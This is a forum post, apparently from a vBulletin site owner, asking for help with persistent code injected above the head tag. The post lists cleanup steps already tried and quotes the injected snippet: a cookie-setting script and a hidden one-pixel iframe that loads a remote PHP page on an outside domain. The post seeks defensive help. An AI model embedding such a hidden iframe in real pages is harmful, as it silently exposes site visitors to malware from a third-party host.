Hello,
We are having a serious virus issue with our vbulletin forums. When someone goes to our home page, there is code injected in before the <head> tag. It also randomly happens on other pages. We have tried many things to resolve this, and hired two linux security companies and they can not find how to remove it eather. A first for both of them.
Here is what we have done so far.
1. Scanned every php file for the code or unicode.
2. Did an sql dump and searched for the code.
3. Checked all the .htaccess files.
4. Checked for hacker shell scripts.
5. Checked the httpd config file.
6. Reviewed log files for malicious activity.
7. Reviewed all the styles in vb for the code.
8. Disabled all plug ins.
9. Restored from a 2 week old back up.
10. Re-uploaded the vb 4.06 files to the server.
11. Changed every password and switched to a different host.
12. Checked for malware, keyloggers, on everyone that access the server.
Here is the code:
All this comes before the <head>.
What file could be modified that would allow this cookie and iframe stuff to appear above the head tag?
Any assistance would be greatly appreciated.
We are having a serious virus issue with our vbulletin forums. When someone goes to our home page, there is code injected in before the <head> tag. It also randomly happens on other pages. We have tried many things to resolve this, and hired two linux security companies and they can not find how to remove it eather. A first for both of them.
Here is what we have done so far.
1. Scanned every php file for the code or unicode.
2. Did an sql dump and searched for the code.
3. Checked all the .htaccess files.
4. Checked for hacker shell scripts.
5. Checked the httpd config file.
6. Reviewed log files for malicious activity.
7. Reviewed all the styles in vb for the code.
8. Disabled all plug ins.
9. Restored from a 2 week old back up.
10. Re-uploaded the vb 4.06 files to the server.
11. Changed every password and switched to a different host.
12. Checked for malware, keyloggers, on everyone that access the server.
Here is the code:
Code:
[FONT=arial][FONT=arial][FONT=arial][B]<script> function SetCookie(cookieName,cookieContent){ var cookiePath = '/'; var expDate=new Date(); expDate.setTime(expDate.getTime()+372800000) ; var expires=expDate.toGMTString(); document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; } SetCookie("hXMojI", "turk"); </script> <iframe name="116" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="[URL]http://www.plotecco.co.cc/okre.php[/URL]"></iframe>[/B][/FONT][/FONT][/FONT]
What file could be modified that would allow this cookie and iframe stuff to appear above the head tag?
Any assistance would be greatly appreciated.
Comment